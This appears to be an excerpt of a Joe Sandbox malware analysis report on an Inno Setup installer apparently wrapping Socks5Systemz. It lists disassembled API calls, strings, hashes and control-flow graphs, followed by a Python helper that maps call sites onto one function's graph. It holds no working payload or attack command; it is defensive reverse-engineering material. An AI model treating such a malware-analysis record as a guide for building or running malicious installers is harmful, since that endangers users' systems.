                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                              • String ID: $(Default)$STOPIMAGE
                                                                              • API String ID: 3271511185-770201673
                                                                              • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                              • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                              • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                              • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                              • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID: unins$unins???.*
                                                                              • API String ID: 3541575487-1009660736
                                                                              • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                              • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                              • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                              • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileFindFirstLast
                                                                              • String ID:
                                                                              • API String ID: 873889042-0
                                                                              • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                              • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                              • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                              • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                              • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstanceVersion
                                                                              • String ID:
                                                                              • API String ID: 1462612201-0
                                                                              • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                              • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                              • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                              • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                              • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                              • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                              • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                              • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                              • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                              • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                              • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                              • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                              • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                              • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                              • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                              • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                                • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                              • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValue
                                                                              • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                              • API String ID: 3132538880-1122008755
                                                                              • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                              • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                              • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                              • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

                                                                              Control-flow Graph
                                                                              control_flow_graph 1019 490c98-490ccc call 403684 1022 490cce-490cdd call 4467f0 Sleep 1019->1022 1023 490ce2-490cef call 403684 1019->1023 1028 491172-49118c call 403420 1022->1028 1029 490d1e-490d2b call 403684 1023->1029 1030 490cf1-490d19 call 44684c call 403738 FindWindowA call 446acc 1023->1030 1038 490d5a-490d67 call 403684 1029->1038 1039 490d2d-490d50 call 44684c call 403738 FindWindowA call 446acc 1029->1039 1047 490d69-490dab call 4467f0 * 4 SendMessageA call 446acc 1038->1047 1048 490db0-490dbd call 403684 1038->1048 1056 490d55 1039->1056 1057 490e0c-490e19 call 403684 1048->1057 1058 490dbf-490e07 call 4467f0 * 4 PostMessageA call 446924 1048->1058 1056->1028 1066 490e68-490e75 call 403684 1057->1066 1067 490e1b-490e63 call 4467f0 * 4 SendNotifyMessageA call 446924 1057->1067 1058->1028 1079 490ea2-490eaf call 403684 1066->1079 1080 490e77-490e9d call 44684c call 403738 RegisterClipboardFormatA call 446acc 1066->1080 1067->1028 1094 490eb1-490eeb call 4467f0 * 3 SendMessageA call 446acc 1079->1094 1095 490ef0-490efd call 403684 1079->1095 1080->1028 1094->1028 1107 490eff-490f3f call 4467f0 * 3 PostMessageA call 446924 1095->1107 1108 490f44-490f51 call 403684 1095->1108 1107->1028 1119 490f98-490fa5 call 403684 1108->1119 1120 490f53-490f93 call 4467f0 * 3 SendNotifyMessageA call 446924 1108->1120 1130 490ffa-491007 call 403684 1119->1130 1131 490fa7-490fc5 call 44684c call 42e2bc 1119->1131 1120->1028 1142 491009-491035 call 44684c call 403738 call 4467f0 GetProcAddress 1130->1142 1143 491081-49108e call 403684 1130->1143 1151 490fd7-490fe5 GetLastError call 446acc 1131->1151 1152 490fc7-490fd5 call 446acc 1131->1152 1176 491071-49107c call 446924 1142->1176 1177 491037-49106c call 4467f0 * 2 call 446acc call 446924 1142->1177 1157 491090-4910b1 call 4467f0 FreeLibrary call 446924 1143->1157 1158 4910b6-4910c3 call 403684 1143->1158 1163 490fea-490ff5 call 446acc 1151->1163 1152->1163 1157->1028 1169 4910e8-4910f5 call 403684 1158->1169 1170 4910c5-4910e3 call 44684c call 403738 CreateMutexA 1158->1170 1163->1028 1185 49112b-491138 call 403684 1169->1185 1186 4910f7-491129 call 48ae84 call 403574 call 403738 OemToCharBuffA call 48ae9c 1169->1186 1170->1028 1176->1028 1177->1028 1195 49113a-49116c call 48ae84 call 403574 call 403738 CharToOemBuffA call 48ae9c 1185->1195 1196 49116e 1185->1196 1186->1028 1195->1028 1196->1028
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                              • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FindSleepWindow
                                                                              • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                              • API String ID: 3078808852-3310373309
                                                                              • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                              • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                              • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                              • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

                                                                              Control-flow Graph
                                                                              control_flow_graph 1573 481df0-481e15 GetModuleHandleA GetProcAddress 1574 481e7c-481e81 GetSystemInfo 1573->1574 1575 481e17-481e2d GetNativeSystemInfo GetProcAddress 1573->1575 1577 481e86-481e8f 1574->1577 1576 481e2f-481e3a GetCurrentProcess 1575->1576 1575->1577 1576->1577 1586 481e3c-481e40 1576->1586 1578 481e9f-481ea6 1577->1578 1579 481e91-481e95 1577->1579 1582 481ec1-481ec6 1578->1582 1580 481ea8-481eaf 1579->1580 1581 481e97-481e9b 1579->1581 1580->1582 1584 481e9d-481eba 1581->1584 1585 481eb1-481eb8 1581->1585 1584->1582 1585->1582 1586->1577 1588 481e42-481e49 call 451d7c 1586->1588 1588->1577 1591 481e4b-481e58 GetProcAddress 1588->1591 1591->1577 1592 481e5a-481e71 GetModuleHandleA GetProcAddress 1591->1592 1592->1577 1593 481e73-481e7a 1592->1593 1593->1577
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                              • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                              • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                              • API String ID: 2230631259-2623177817
                                                                              • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                              • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                              • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                              • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF
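The entry above gives this function's basic blocks as one flattened `control_flow_graph` edge list and its call sites only as bare `ref:` addresses in the APIs list, which makes it slow to see which branch a given import lookup sits on. The following is an added Python example, not code from the Joe Sandbox report or from the sample: it parses the edge list, finds the block that contains each `ref:` address and returns the shortest path from the function's entry block to it. The two input strings are copied from the 0x481df0 entry; the token grammar it assumes (a short decimal block id followed by a 6 to 8 hex-digit address or `start-end` range, `a->b` for edges, every other token a label of the current block), the function names and the BFS are my own reading of the export, and it also accepts the single-address block form (`1056 490d55`, `1196 49116e`) that appears in the dispatcher entry earlier in this section.

```python
# Added example, not part of the Joe Sandbox report or of the analysed sample:
# rebuild a function's basic-block graph from its 'control_flow_graph' dump and
# place the 'APIs' call sites on it. The two inputs are copied from the 0x481df0
# entry; the grammar assumed below, the names and the path search are my own.
import re
from collections import deque

# Copied from the report's control_flow_graph line for the function at 0x481df0.
CFG_TEXT = (
    "control_flow_graph 1573 481df0-481e15 GetModuleHandleA GetProcAddress 1574 481e7c-481e81 "
    "GetSystemInfo 1573->1574 1575 481e17-481e2d GetNativeSystemInfo GetProcAddress 1573->1575 "
    "1577 481e86-481e8f 1574->1577 1576 481e2f-481e3a GetCurrentProcess 1575->1576 1575->1577 "
    "1576->1577 1586 481e3c-481e40 1576->1586 1578 481e9f-481ea6 1577->1578 1579 481e91-481e95 "
    "1577->1579 1582 481ec1-481ec6 1578->1582 1580 481ea8-481eaf 1579->1580 1581 481e97-481e9b "
    "1579->1581 1580->1582 1584 481e9d-481eba 1581->1584 1585 481eb1-481eb8 1581->1585 1584->1582 "
    "1585->1582 1586->1577 1588 481e42-481e49 call 451d7c 1586->1588 1588->1577 1591 481e4b-481e58 "
    "GetProcAddress 1588->1591 1591->1577 1592 481e5a-481e71 GetModuleHandleA GetProcAddress "
    "1591->1592 1592->1577 1593 481e73-481e7a 1592->1593 1593->1577"
)

# Seven of the nine bullets from the report's APIs list for the same function.
API_TEXT = """\
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
• GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
• GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
• GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
"""

# Assumed grammar: a block is '<short decimal id> <hex addr>' or '<id> <start>-<end>'
# (6-8 hex digits); '<id>-><id>' is an edge; any other token is a label of the
# current block (API name, 'call <addr>', '* <n>' repeat count).
RANGE_RE = re.compile(r"^[0-9a-f]{6,8}(?:-[0-9a-f]{6,8})?$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_cfg(text):
    """Return ({block id: (start, end, labels)}, [(src, dst), ...])."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        m = EDGE_RE.match(toks[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif toks[i].isdigit() and i + 1 < len(toks) and RANGE_RE.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")
            cur = int(toks[i])
            nodes[cur] = (int(lo, 16), int(hi or lo, 16), [])
            i += 2
        elif cur is None:
            raise ValueError(f"label {toks[i]!r} before any block")
        else:
            nodes[cur][2].append(toks[i])
            i += 1
    return nodes, edges


def block_for(nodes, addr):
    """Id of the block whose inclusive [start, end] range contains addr, else None."""
    return next((n for n, (lo, hi, _) in nodes.items() if lo <= addr <= hi), None)


def shortest_path(edges, src, dst):
    """BFS over the edge list: [src, ..., dst], or None when dst is unreachable."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    parent, queue = {src: None}, deque([src])
    while queue:
        cur = queue.popleft()
        if cur == dst:
            path = []
            while cur is not None:
                path.append(cur)
                cur = parent[cur]
            return path[::-1]
        for nxt in succ.get(cur, []):
            if nxt not in parent:
                parent[nxt] = cur
                queue.append(nxt)
    return None


def parse_api_lines(text):
    """(api, module, args, site address) for each '• Api.MODULE(args), ref: addr' bullet."""
    return [(m.group(1), m.group(2), m.group(3), int(m.group(4), 16))
            for m in map(API_RE.search, text.splitlines()) if m]


def map_call_sites(cfg_text, api_text):
    """Per call site: (api, args, block id, shortest path from the entry block)."""
    nodes, edges = parse_cfg(cfg_text)
    entry = min(nodes, key=lambda n: nodes[n][0])   # lowest address = function entry
    rows = []
    for api, _mod, args, site in parse_api_lines(api_text):
        blk = block_for(nodes, site)
        rows.append((api, args, blk, None if blk is None else shortest_path(edges, entry, blk)))
    return rows


if __name__ == "__main__":
    for api, args, blk, path in map_call_sites(CFG_TEXT, API_TEXT):
        route = " -> ".join(map(str, path)) if path else "unreached"
        print(f"{api}({args}) in block {blk}: {route}")
```

Run as a script it prints, for each call site, its block and the route to it. For the `GetSystemWow64DirectoryA` lookup at 00481E51 the route is 1573 -> 1575 -> 1576 -> 1586 -> 1588 -> 1591, and the advapi32/`RegDeleteKeyExA` lookup in block 1592 hangs off 1591, so both are only reached through the blocks that resolve `GetNativeSystemInfo` and `IsWow64Process` (1575) and call `GetCurrentProcess` (1576); the `GetSystemInfo` fallback in 1574 is the other branch out of the entry block. That is the shape of a 64-bit-Windows probe. The strings in this and the neighbouring entries (`CALLDLLPROC`/`LOADDLL`, `Cannot access 64-bit registry keys on this version of Windows`, the `Inno Setup: ...` uninstall values, `_isetup\_shfoldr.dll`, `_setup64.tmp`) are Inno Setup's own setup-stub strings, so these functions belong to the installer wrapper rather than to the Socks5Systemz payload the report detects; the graph walk is still the quickest way to confirm which branch the stub took in the sandbox.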

                                                                              Control-flow Graph
